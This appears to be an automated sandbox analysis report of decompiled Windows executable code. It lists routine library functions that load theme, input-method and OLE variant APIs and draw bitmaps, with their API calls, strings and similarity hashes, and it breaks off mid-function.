E0042B5CC(void* __ebx, void* __ecx) { char _v5; intOrPtr _t2; intOrPtr _t6; intOrPtr _t108; intOrPtr _t111; _t2 = *0x466474; // 0x27ea870 E0042B3FC(_t2); _push(_t111); _push(0x42b97f); _push( *[fs:eax]); *[fs:eax] = _t111; *0x466470 = *0x466470 + 1; if( *0x46646c == 0) { *0x46646c = LoadLibraryA("uxtheme.dll"); if( *0x46646c > 0) { *0x4663ac = GetProcAddress( *0x46646c, "OpenThemeData"); *0x4663b0 = GetProcAddress( *0x46646c, "CloseThemeData"); *0x4663b4 = GetProcAddress( *0x46646c, "DrawThemeBackground"); *0x4663b8 = GetProcAddress( *0x46646c, "DrawThemeText"); *0x4663bc = GetProcAddress( *0x46646c, "GetThemeBackgroundContentRect"); *0x4663c0 = GetProcAddress( *0x46646c, "GetThemeBackgroundContentRect"); *0x4663c4 = GetProcAddress( *0x46646c, "GetThemePartSize"); *0x4663c8 = GetProcAddress( *0x46646c, "GetThemeTextExtent"); *0x4663cc = GetProcAddress( *0x46646c, "GetThemeTextMetrics"); *0x4663d0 = GetProcAddress( *0x46646c, "GetThemeBackgroundRegion"); *0x4663d4 = GetProcAddress( *0x46646c, "HitTestThemeBackground"); *0x4663d8 = GetProcAddress( *0x46646c, "DrawThemeEdge"); *0x4663dc = GetProcAddress( *0x46646c, "DrawThemeIcon"); *0x4663e0 = GetProcAddress( *0x46646c, "IsThemePartDefined"); *0x4663e4 = GetProcAddress( *0x46646c, "IsThemeBackgroundPartiallyTransparent"); *0x4663e8 = GetProcAddress( *0x46646c, "GetThemeColor"); *0x4663ec = GetProcAddress( *0x46646c, "GetThemeMetric"); *0x4663f0 = GetProcAddress( *0x46646c, "GetThemeString"); *0x4663f4 = GetProcAddress( *0x46646c, "GetThemeBool"); *0x4663f8 = GetProcAddress( *0x46646c, "GetThemeInt"); *0x4663fc = GetProcAddress( *0x46646c, "GetThemeEnumValue"); *0x466400 = GetProcAddress( *0x46646c, "GetThemePosition"); *0x466404 = GetProcAddress( *0x46646c, "GetThemeFont"); *0x466408 = GetProcAddress( *0x46646c, "GetThemeRect"); *0x46640c = GetProcAddress( *0x46646c, "GetThemeMargins"); *0x466410 = GetProcAddress( *0x46646c, "GetThemeIntList"); *0x466414 = GetProcAddress( *0x46646c, "GetThemePropertyOrigin"); *0x466418 = GetProcAddress( *0x46646c, "SetWindowTheme"); *0x46641c = GetProcAddress( *0x46646c, "GetThemeFilename"); *0x466420 = GetProcAddress( *0x46646c, "GetThemeSysColor"); *0x466424 = GetProcAddress( *0x46646c, "GetThemeSysColorBrush"); *0x466428 = GetProcAddress( *0x46646c, "GetThemeSysBool"); *0x46642c = GetProcAddress( *0x46646c, "GetThemeSysSize"); *0x466430 = GetProcAddress( *0x46646c, "GetThemeSysFont"); *0x466434 = GetProcAddress( *0x46646c, "GetThemeSysString"); *0x466438 = GetProcAddress( *0x46646c, "GetThemeSysInt"); *0x46643c = GetProcAddress( *0x46646c, "IsThemeActive"); *0x466440 = GetProcAddress( *0x46646c, "IsAppThemed"); *0x466444 = GetProcAddress( *0x46646c, "GetWindowTheme"); *0x466448 = GetProcAddress( *0x46646c, "EnableThemeDialogTexture"); *0x46644c = GetProcAddress( *0x46646c, "IsThemeDialogTextureEnabled"); *0x466450 = GetProcAddress( *0x46646c, "GetThemeAppProperties"); *0x466454 = GetProcAddress( *0x46646c, "SetThemeAppProperties"); *0x466458 = GetProcAddress( *0x46646c, "GetCurrentThemeName"); *0x46645c = GetProcAddress( *0x46646c, "GetThemeDocumentationProperty"); *0x466460 = GetProcAddress( *0x46646c, "DrawThemeParentBackground"); *0x466464 = GetProcAddress( *0x46646c, "EnableTheming"); } } _v5 = *0x46646c > 0; _pop(_t108); *[fs:eax] = _t108; _push(0x42b986); _t6 = *0x466474; // 0x27ea870 return E0042B404(_t6); } 0x0042b5d6 0x0042b5db 0x0042b5e2 0x0042b5e3 0x0042b5e8 0x0042b5eb 0x0042b5ee 0x0042b5f7 0x0042b607 0x0042b60c 0x0042b61f 0x0042b631 0x0042b643 0x0042b655 0x0042b667 0x0042b679 0x0042b68b 0x0042b69d 0x0042b6af 0x0042b6c1 0x0042b6d3 0x0042b6e5 0x0042b6f7 0x0042b709 0x0042b71b 0x0042b72d 0x0042b73f 0x0042b751 0x0042b763 0x0042b775 0x0042b787 0x0042b799 0x0042b7ab 0x0042b7bd 0x0042b7cf 0x0042b7e1 0x0042b7f3 0x0042b805 0x0042b817 0x0042b829 0x0042b83b 0x0042b84d 0x0042b85f 0x0042b871 0x0042b883 0x0042b895 0x0042b8a7 0x0042b8b9 0x0042b8cb 0x0042b8dd 0x0042b8ef 0x0042b901 0x0042b913 0x0042b925 0x0042b937 0x0042b949 0x0042b95b 0x0042b95b 0x0042b60c 0x0042b963 0x0042b969 0x0042b96c 0x0042b96f 0x0042b974 0x0042b97e

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042B97F), ref: 0042B602 GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042B61A GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042B62C GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042B63E GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042B650 GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042B662 GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042B674 GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042B686 GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042B698 GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042B6AA GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042B6BC GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042B6CE GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042B6E0 GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042B6F2 GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042B704 GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042B716 GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042B728 GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042B73A GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042B74C GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042B75E GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042B770 GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042B782 GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042B794 GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042B7A6 GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042B7B8 GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042B7CA GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042B7DC GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042B7EE GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042B800 GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042B812 GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042B824 GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042B836 GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042B848 GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042B85A GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042B86C GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042B87E GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042B890 GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042B8A2 GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042B8B4 GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042B8C6 GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042B8D8 GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042B8EA GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042B8FC GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042B90E GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042B920 GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042B932 GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042B944 GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042B956

Strings

OpenThemeData , xrefs: 0042B612 EnableThemeDialogTexture , xrefs: 0042B8D0 DrawThemeIcon , xrefs: 0042B6EA IsAppThemed , xrefs: 0042B8AC SetThemeAppProperties , xrefs: 0042B906 DrawThemeBackground , xrefs: 0042B636 IsThemeDialogTextureEnabled , xrefs: 0042B8E2 IsThemeActive , xrefs: 0042B89A DrawThemeText , xrefs: 0042B648 GetCurrentThemeName , xrefs: 0042B918 GetThemeEnumValue , xrefs: 0042B77A GetThemePropertyOrigin , xrefs: 0042B7E6 GetThemePartSize , xrefs: 0042B67E GetThemeSysColorBrush , xrefs: 0042B82E GetThemePosition , xrefs: 0042B78C IsThemeBackgroundPartiallyTransparent , xrefs: 0042B70E GetThemeInt , xrefs: 0042B768 CloseThemeData , xrefs: 0042B624 GetThemeBackgroundRegion , xrefs: 0042B6B4 GetThemeTextExtent , xrefs: 0042B690 SetWindowTheme , xrefs: 0042B7F8 GetThemeBackgroundContentRect , xrefs: 0042B65A, 0042B66C GetWindowTheme , xrefs: 0042B8BE GetThemeAppProperties , xrefs: 0042B8F4 DrawThemeEdge , xrefs: 0042B6D8 GetThemeSysString , xrefs: 0042B876 GetThemeDocumentationProperty , xrefs: 0042B92A GetThemeFont , xrefs: 0042B79E GetThemeSysFont , xrefs: 0042B864 GetThemeSysBool , xrefs: 0042B840 GetThemeMetric , xrefs: 0042B732 GetThemeSysColor , xrefs: 0042B81C GetThemeColor , xrefs: 0042B720 GetThemeIntList , xrefs: 0042B7D4 DrawThemeParentBackground , xrefs: 0042B93C GetThemeRect , xrefs: 0042B7B0 GetThemeSysSize , xrefs: 0042B852 GetThemeSysInt , xrefs: 0042B888 IsThemePartDefined , xrefs: 0042B6FC HitTestThemeBackground , xrefs: 0042B6C6 GetThemeTextMetrics , xrefs: 0042B6A2 GetThemeFilename , xrefs: 0042B80A GetThemeMargins , xrefs: 0042B7C2 uxtheme.dll , xrefs: 0042B5FD GetThemeString , xrefs: 0042B744 EnableTheming , xrefs: 0042B94E GetThemeBool , xrefs: 0042B756

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll API String ID: 2238633743-2910565190 Opcode ID: d1f5ae21772bde1dc101fc0c65939c113a2ac02c18929f536ac1eaa0c24a1e19 Instruction ID: 02f122594848a3c283428a16239ca51583220fa1077c2258b21d737a31e4475e Opcode Fuzzy Hash: d1f5ae21772bde1dc101fc0c65939c113a2ac02c18929f536ac1eaa0c24a1e19 Instruction Fuzzy Hash: 93A12EB0640734AFDB00EB65EC86A253FA8EB45704752067BF401DF295E7B9A850CB5E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%

E004474DC() { int _v8; intOrPtr _t4; struct HINSTANCE__* _t11; struct HINSTANCE__* _t13; struct HINSTANCE__* _t15; struct HINSTANCE__* _t17; struct HINSTANCE__* _t19; struct HINSTANCE__* _t21; struct HINSTANCE__* _t23; struct HINSTANCE__* _t25; struct HINSTANCE__* _t27; struct HINSTANCE__* _t29; intOrPtr _t40; intOrPtr _t42; intOrPtr _t44; _t42 = _t44; _t4 = *0x462f3c; // 0x4658c8 if( *((char*)(_t4 + 0xc)) == 0) { return _t4; } else { _v8 = SetErrorMode(0x8000); _push(_t42); _push(0x447642); _push( *[fs:eax]); *[fs:eax] = _t44; if( *0x466548 == 0) { *0x466548 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME"); } if( *0x46268c == 0) { *0x46268c = LoadLibraryA("imm32.dll"); if( *0x46268c != 0) { _t11 = *0x46268c; // 0x0 *0x46654c = GetProcAddress(_t11, "ImmGetContext"); _t13 = *0x46268c; // 0x0 *0x466550 = GetProcAddress(_t13, "ImmReleaseContext"); _t15 = *0x46268c; // 0x0 *0x466554 = GetProcAddress(_t15, "ImmGetConversionStatus"); _t17 = *0x46268c; // 0x0 *0x466558 = GetProcAddress(_t17, "ImmSetConversionStatus"); _t19 = *0x46268c; // 0x0 *0x46655c = GetProcAddress(_t19, "ImmSetOpenStatus"); _t21 = *0x46268c; // 0x0 *0x466560 = GetProcAddress(_t21, "ImmSetCompositionWindow"); _t23 = *0x46268c; // 0x0 *0x466564 = GetProcAddress(_t23, "ImmSetCompositionFontA"); _t25 = *0x46268c; // 0x0 *0x466568 = GetProcAddress(_t25, "ImmGetCompositionStringA"); _t27 = *0x46268c; // 0x0 *0x46656c = GetProcAddress(_t27, "ImmIsIME"); _t29 = *0x46268c; // 0x0 *0x466570 = GetProcAddress(_t29, "ImmNotifyIME"); } } _pop(_t40); *[fs:eax] = _t40; _push(0x447649); return SetErrorMode(_v8); } } 0x004474dd 0x004474e1 0x004474ea 0x0044764c 0x004474f0 0x004474fa 0x004474ff 0x00447500 0x00447505 0x00447508 0x00447512 0x0044752b 0x0044752b 0x00447537 0x00447547 0x00447553 0x0044755e 0x00447569 0x00447573 0x0044757e 0x00447588 0x00447593 0x0044759d 0x004475a8 0x004475b2 0x004475bd 0x004475c7 0x004475d2 0x004475dc 0x004475e7 0x004475f1 0x004475fc 0x00447606 0x00447611 0x0044761b 0x00447626 0x00447626 0x00447553 0x0044762d 0x00447630 0x00447633 0x00447641 0x00447641

APIs

SetErrorMode.KERNEL32(00008000), ref: 004474F5 GetModuleHandleA.KERNEL32(USER32,00000000,00447642,?,00008000), ref: 00447519 GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00447526 LoadLibraryA.KERNEL32(imm32.dll,00000000,00447642,?,00008000), ref: 00447542 GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00447564 GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00447579 GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044758E GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004475A3 GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004475B8 GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004475CD GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004475E2 GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004475F7 GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044760C GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00447621 SetErrorMode.KERNEL32(?,00447649,00008000), ref: 0044763C

Strings

ImmNotifyIME , xrefs: 00447616 ImmIsIME , xrefs: 00447601 ImmGetContext , xrefs: 00447559 ImmSetOpenStatus , xrefs: 004475AD USER32 , xrefs: 00447514 ImmSetConversionStatus , xrefs: 00447598 ImmGetCompositionStringA , xrefs: 004475EC imm32.dll , xrefs: 0044753D ImmSetCompositionWindow , xrefs: 004475C2 WINNLSEnableIME , xrefs: 00447520 ImmReleaseContext , xrefs: 0044756E ImmSetCompositionFontA , xrefs: 004475D7 ImmGetConversionStatus , xrefs: 00447583

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll API String ID: 3397921170-3950384806 Opcode ID: 85cd7dde39b5c599270180dfbc2611d832bb0dc38289b90c796d1fbcd3152a98 Instruction ID: e70fe7214d08f84b75ceb215c1bd47e4ba2206317c64f215ae3433f6c64e5f95 Opcode Fuzzy Hash: 85cd7dde39b5c599270180dfbc2611d832bb0dc38289b90c796d1fbcd3152a98 Instruction Fuzzy Hash: 16314CF0644B10BFEB04EB69ED06A153BA9A304314713463AF102D72A0E7FD6811CB2E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0040E778() { struct HINSTANCE__* _v8; intOrPtr _t46; void* _t91; _v8 = GetModuleHandleA("oleaut32.dll"); *0x466228 = E0040E74C("VariantChangeTypeEx", E0040E2C4, _t91); *0x46622c = E0040E74C("VarNeg", E0040E2F4, _t91); *0x466230 = E0040E74C("VarNot", E0040E2F4, _t91); *0x466234 = E0040E74C("VarAdd", E0040E300, _t91); *0x466238 = E0040E74C("VarSub", E0040E300, _t91); *0x46623c = E0040E74C("VarMul", E0040E300, _t91); *0x466240 = E0040E74C("VarDiv", E0040E300, _t91); *0x466244 = E0040E74C("VarIdiv", E0040E300, _t91); *0x466248 = E0040E74C("VarMod", E0040E300, _t91); *0x46624c = E0040E74C("VarAnd", E0040E300, _t91); *0x466250 = E0040E74C("VarOr", E0040E300, _t91); *0x466254 = E0040E74C("VarXor", E0040E300, _t91); *0x466258 = E0040E74C("VarCmp", E0040E30C, _t91); *0x46625c = E0040E74C("VarI4FromStr", E0040E318, _t91); *0x466260 = E0040E74C("VarR4FromStr", E0040E384, _t91); *0x466264 = E0040E74C("VarR8FromStr", E0040E3F0, _t91); *0x466268 = E0040E74C("VarDateFromStr", E0040E45C, _t91); *0x46626c = E0040E74C("VarCyFromStr", E0040E4C8, _t91); *0x466270 = E0040E74C("VarBoolFromStr", E0040E534, _t91); *0x466274 = E0040E74C("VarBstrFromCy", E0040E5B4, _t91); *0x466278 = E0040E74C("VarBstrFromDate", E0040E624, _t91); _t46 = E0040E74C("VarBstrFromBool", E0040E698, _t91); *0x46627c = _t46; return _t46; } 0x0040e786 0x0040e79a 0x0040e7b0 0x0040e7c6 0x0040e7dc 0x0040e7f2 0x0040e808 0x0040e81e 0x0040e834 0x0040e84a 0x0040e860 0x0040e876 0x0040e88c 0x0040e8a2 0x0040e8b8 0x0040e8ce 0x0040e8e4 0x0040e8fa 0x0040e910 0x0040e926 0x0040e93c 0x0040e952 0x0040e962 0x0040e968 0x0040e96f

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040E781 Part of subcall function 0040E74C: GetProcAddress.KERNEL32(00000000), ref: 0040E765

Strings

VarAnd , xrefs: 0040E855 VarMul , xrefs: 0040E7FD VarBstrFromBool , xrefs: 0040E95D VarBoolFromStr , xrefs: 0040E91B VarR8FromStr , xrefs: 0040E8D9 VarOr , xrefs: 0040E86B VarCmp , xrefs: 0040E897 VarBstrFromDate , xrefs: 0040E947 VarCyFromStr , xrefs: 0040E905 VarI4FromStr , xrefs: 0040E8AD VarMod , xrefs: 0040E83F VarNeg , xrefs: 0040E7A5 VarXor , xrefs: 0040E881 VarDateFromStr , xrefs: 0040E8EF VarSub , xrefs: 0040E7E7 oleaut32.dll , xrefs: 0040E77C VarIdiv , xrefs: 0040E829 VarNot , xrefs: 0040E7BB VarBstrFromCy , xrefs: 0040E931 VarR4FromStr , xrefs: 0040E8C3 VarDiv , xrefs: 0040E813 VarAdd , xrefs: 0040E7D1 VariantChangeTypeEx , xrefs: 0040E78F

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll API String ID: 1646373207-1918263038 Opcode ID: ea9ec8e8f90291ffff50c1c1e118d913d94cc886ee4d1766b9f2028276f0950e Instruction ID: 8f20ae1609fd2dd0fa028a6c57cffb4e97aaf0264b3ec7f3cdfbc11af4dc0977 Opcode Fuzzy Hash: ea9ec8e8f90291ffff50c1c1e118d913d94cc886ee4d1766b9f2028276f0950e Instruction Fuzzy Hash: 424124A16052045BE3047B6F785552BBB99D648714360CC7FF804FB6E1EB7CAC618A2F

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E00426DC4(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) { int _v8; int _v12; char _v13; struct HDC__* _v20; void* _v24; void* _v28; long _v32; long _v36; struct HPALETTE__* _v40; intOrPtr* _t78; struct HPALETTE__* _t89; struct HPALETTE__* _t95; int _t169; intOrPtr _t176; intOrPtr _t177; struct HDC__* _t179; int _t181; void* _t183; void* _t184; intOrPtr _t185; _t183 = _t184; _t185 = _t184 + 0xffffffdc; _v12 = __ecx; _v8 = __edx; _t179 = __eax; _t181 = _a16; _t169 = _a20; _v13 = 1; _t78 = *0x462f2c; // 0x4617c0 if( *_t78 != 2 || _t169 != _a40 || _t181 != _a36) { _v40 = 0; _v20 = E00426C14(CreateCompatibleDC(0)); _push(_t183); _push(0x427039); _push( *[fs:eax]); *[fs:eax] = _t185; _v24 = E00426C14(CreateCompatibleBitmap(_a32, _t169, _t181)); _v28 = SelectObject(_v20, _v24); _t89 = *0x46634c; // 0x7a080b2a _v40 = SelectPalette(_a32, _t89, 0); SelectPalette(_a32, _v40, 0); if(_v40 == 0) { _t95 = *0x46634c; // 0x7a080b2a _v40 = SelectPalette(_v20, _t95, 0xffffffff); } else { _v40 = SelectPalette(_v20, _v40, 0xffffffff); } RealizePalette(_v20); StretchBlt(_v20, 0, 0, _t169, _t181, _a12, _a8, _a4, _t169, _t181, 0xcc0020); StretchBlt(_v20, 0, 0, _t169, _t181, _a32, _a28, _a24, _t169, _t181, 0x440328); _v32 = SetTextColor(_t179, 0); _v36 = SetBkColor(_t179, 0xffffff); StretchBlt(_t179, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t169, _t181, 0x8800c6); StretchBlt(_t179, _v8, _v12, _a40, _a36, _v20, 0, 0, _t169, _t181, 0x660046); SetTextColor(_t179, _v32); SetBkColor(_t179, _v36); if(_v28 != 0) { SelectObject(_v20, _v28); } DeleteObject(_v24); _pop(_t176); *[fs:eax] = _t176; _push(0x427040); if(_v40 != 0) { SelectPalette(_v20, _v40, 0); } return DeleteDC(_v20); } else { _v24 = E00426C14(CreateCompatibleBitmap(_a32, 1, 1)); _v24 = SelectObject(_a12, _v24); _push(_t183); _push(0x426e8c); _push( *[fs:eax]); *[fs:eax] = _t185; MaskBlt(_t179, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, 0xccaa0029); _pop(_t177); *[fs:eax] = _t177; _push(0x427040); _v24 = SelectObject(_a12, _v24); return DeleteObject(_v24); } } 0x00426dc5 0x00426dc7 0x00426dcd 0x00426dd0 0x00426dd3 0x00426dd5 0x00426dd8 0x00426ddb 0x00426ddf 0x00426de7 0x00426e95 0x00426ea4 0x00426ea9 0x00426eaa 0x00426eaf 0x00426eb2 0x00426ec5 0x00426ed5 0x00426eda 0x00426ee9 0x00426ef6 0x00426eff 0x00426f17 0x00426f26 0x00426f01 0x00426f10 0x00426f10 0x00426f2d 0x00426f4f 0x00426f71 0x00426f7e 0x00426f8c 0x00426fb3 0x00426fd8 0x00426fe2 0x00426fec 0x00426ff5 0x00426fff 0x00426fff 0x00427008 0x0042700f 0x00427012 0x00427015 0x0042701e 0x0042702a 0x0042702a 0x00427038 0x00426dff 0x00426e11 0x00426e21 0x00426e26 0x00426e27 0x00426e2c 0x00426e2f 0x00426e60 0x00426e67 0x00426e6a 0x00426e6d 0x00426e7f 0x00426e8b 0x00426e8b

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00426E07 SelectObject.GDI32(?,?), ref: 00426E1C MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,00426E8C,?,?), ref: 00426E60 SelectObject.GDI32(?,?), ref: 00426E7A DeleteObject.GDI32(?), ref: 00426E86 CreateCompatibleDC.GDI32(00000000), ref: 00426E9A CreateCompatibleBitmap.GDI32(?,?,?), ref: 00426EBB SelectObject.GDI32(?,?), ref: 00426ED0 SelectPalette.GDI32(?,7A080B2A,00000000), ref: 00426EE4 SelectPalette.GDI32(?,?,00000000), ref: 00426EF6 SelectPalette.GDI32(?,00000000,000000FF), ref: 00426F0B SelectPalette.GDI32(?,7A080B2A,000000FF), ref: 00426F21 RealizePalette.GDI32(?), ref: 00426F2D StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00426F4F StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00426F71 SetTextColor.GDI32(?,00000000), ref: 00426F79 SetBkColor.GDI32(?,00FFFFFF), ref: 00426F87 StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00426FB3 StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426FD8 SetTextColor.GDI32(?,?), ref: 00426FE2 SetBkColor.GDI32(?,?), ref: 00426FEC SelectObject.GDI32(?,00000000), ref: 00426FFF DeleteObject.GDI32(?), ref: 00427008 SelectPalette.GDI32(?,00000000,00000000), ref: 0042702A DeleteDC.GDI32(?), ref: 00427033

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize String ID: API String ID: 3976802218-0 Opcode ID: 517ab2346d95a81a61c2b3fce6b0763266c4b79982b9ae684a357dafb73be95f Instruction ID: 9a8f0c8cc2b2705459631c9561ebf8b7562dc7de34ad384d938fd6bc3ac72156 Opcode Fuzzy Hash: 517ab2346d95a81a61c2b3fce6b0763266c4b79982b9ae684a357dafb73be95f Instruction Fuzzy Hash: B681A4B1A00219AFDB50EFA9CD81EAF77FCEB0D714F124459F618E7281C239AD108B65

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E00428D58(void* __eax, long __ecx, struct HPALETTE__* __edx) { struct HBITMAP__* _v8; struct HDC__* _v12; struct HDC__* _v16; struct HDC__* _v20; char _v21; void* _v28; void* _v32; intOrPtr _v92; intOrPtr _v96; int _v108; int _v112; void _v116; int _t68; long _t82; void* _t117; intOrPtr _t126; intOrPtr _t127; long _t130; struct HPALETTE__* _t133; void* _t137; void* _t139; intOrPtr _t140; _t137 = _t139; _t140 = _t139 + 0xffffff90; _t130 = __ecx; _t133 = __edx; _t117 = __eax; _v8 = 0; if(__eax == 0 || GetObjectA(__eax, 0x54, &_v116) == 0) { return _v8; } else { E0042824C(_t117); _v12 = 0; _v20 = 0; _push(_t137); _push(0x428f53); _push( *[fs:eax]); *[fs:eax] = _t140; _v12 = E00426C14(GetDC(0)); _v20 = E00426C14(CreateCompatibleDC(_v12)); _v8 = CreateBitmap(_v112, _v108, 1, 1, 0); if(_v8 == 0) { L17: _t68 = 0; _pop(_t126); *[fs:eax] = 